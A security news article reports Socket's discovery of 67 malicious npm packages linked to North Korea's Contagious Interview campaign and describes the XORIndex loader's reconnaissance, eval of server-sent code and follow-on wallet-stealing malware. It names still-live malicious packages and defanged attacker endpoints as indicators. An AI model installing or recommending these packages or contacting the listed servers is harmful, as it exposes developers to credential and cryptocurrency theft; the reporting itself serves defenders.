67 Malicious npm Packages Used by North Korean Hackers to Spread XORIndex Malware

A newly identified wave of malicious software supply chain activity linked to North Korea has infiltrated the popular JavaScript package ecosystem npm, targeting developers worldwide.

The campaign, uncovered by Socket’s Threat Research Team, centers around a stealthy new malware loader dubbed XORIndex and marks a dangerous evolution of previous attacks involving the HexEval Loader.

In total, 67 malicious npm packages were deployed, with 28 containing the XORIndex Loader and 39 tied to the ongoing HexEval campaign.

Combined, these packages have accumulated over 17,000 downloads, with 27 packages still active at the time of reporting.

XORIndex – A New Obfuscated Malware Loader

The XORIndex Loader is named for its use of XOR-based string obfuscation and index-based code hiding, allowing it to evade conventional security scans.

Upon installation of a malicious npm package, such as the still-live eth-auditlog, vite-meta-plugin, or cronek, the loader performs host reconnaissance, collecting details such as:

• Hostname
• Current username
• Operating system
• External IP address
• Basic geolocation

The collected data is exfiltrated to a command-and-control (C2) endpoint such as https://log-writter[.]vercel[.]app/api/ipcheck, hosted on Vercel.

The malware then runs arbitrary JavaScript code returned by the C2 server, eval()  activating a dangerous chain of execution that downloads and runs the second-stage malware known as BeaverTail.

BeaverTail & InvisibleFerret – Full-Scale Credential Theft

Once executed, BeaverTail scans nearly 50 wallet and browser extension locations, collecting sensitive data related to cryptocurrencies.

It targets platforms including MetaMask, Phantom, TronLink, Solana CLI, and even macOS keychains. Data is compressed into an archive and sent to hardcoded exfiltration servers like http://144[.]217[.]86[.]88/uploads.

From there, BeaverTail attempts to fetch and inject a third-stage malware known as InvisibleFerret, which enables remote access, command execution, and long-term persistence on compromised systems, posing a particularly significant threat to developers and cryptocurrency users.

Ongoing Supply Chain Threats

This attack is part of a wider North Korean espionage and theft campaign known as Contagious Interview, targeting developers, job seekers, and cryptocurrency holders.

Both the XORIndex and HexEval campaigns exhibit signs of rapid iteration, with threat actors employing rotating npm aliases, utilizing legitimate cloud infrastructure, and employing sophisticated obfuscation tactics.

Security teams are advised to monitor package installation behaviors and integrate tools such as the Socket GitHub App, CLI, and browser extension to detect suspicious dependencies before they reach production environments.

A complete list of compromised packages, npm aliases, and C2 infrastructure has been published by Socket to aid in threat detection and mitigation.